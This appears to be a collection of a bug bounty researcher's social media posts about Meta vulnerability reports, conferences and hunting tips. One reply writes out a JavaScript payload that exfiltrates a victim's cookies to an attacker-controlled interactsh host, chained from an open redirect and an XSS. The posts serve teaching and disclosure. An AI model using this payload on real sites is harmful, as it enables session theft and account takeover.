In this blog, I will discuss how a security vulnerability I discovered a year ago in Facebook/Meta could be used to affect the US election and how a simple IDOR vulnerability could have a major impact.
I hope you enjoy it :)
#USElection2024#bugbounty
https://t.co/mAc2F4LrjS
@covert_bugs You may try using older versions that have the "Whitehat Setting" then update the app to latest version. Otherwise, you can find some frida scripts available online on Github to bypass SSL for Instagram.
It was great to attend the Meta Bug Bounty Researchers Conference (BountyCon'24) in Johannesburg, South Africa ๐ฟ๐ฆ๐จ๐ปโ๐ป. I had the opportunity to meet and network with greatest hackers, learn new topics, and connect with the Meta Security team.
#meta#cybersecurity#bugbountytips
@covert_bugs I hunt on Android devices; There is a researcher setting that can help you intercept the Facebook mobile requests. For iOS, you can find some GitHub repositories that contain Frida scripts to bypass SSL. Try searching "Facebook SSL Bypass iOS - GitHub" and check that suit you.
I'm excited to speak at GISEC Global, Middle East and Africa's Largest Cybersecurity event - from 23-25 April 2024 at Dubai World Trade Centre.
Come and join me, register now for a free pass: https://t.co/52UzaMr9sA
#GISECGLOBAL#cybersecurity#infosecurity#ethicalhacking
Found an endpoint:
โฆ/redacted?redirectionParam=/Path
1. Supplied any url: (Open redirect โ )
2.Supplied javascript:alert(1) ( XSS โ )
3.Created payload to steal the victimโs cookies and redirect them to our own website: ( ATO โ )
#BugBounty#bugbountytips#hackerone
@m4ngofloat_ Above is a simple payload that retrieve the cookies using document.cookie then redirect the victim to our own website and appends the cookies to the URL. Then you can check the logs on your website and retrieve the victim cookies.
@m4ngofloat_ You may write your own JS payload that steal the victim cookies and redirect it to your own server.
E.g:
javascript:(function() {
var data = encodeURIComponent(document.cookie);
window.location.href = "https://{INTERACTSH_LINK}/attacker?cookies="%2bdata;
})();
This is how I was able to leak the cover pages of secret documents that were supposed to be private๐ฅ.
Check out my write-up below. I'd love to hear your thoughts and feedback.
#hackerone#Cybersecurity#ethicalhacking#cyberattacks#bugbounty
https://t.co/2sWJKfenwT
For people who were unable to access my write-up on Medium, I have created the article below on Linkedin, and you will be able to read the full write-up.
I'm sorry for the inconvenience! I hope you enjoy reading the write-up!
https://t.co/zQZ8hM2aga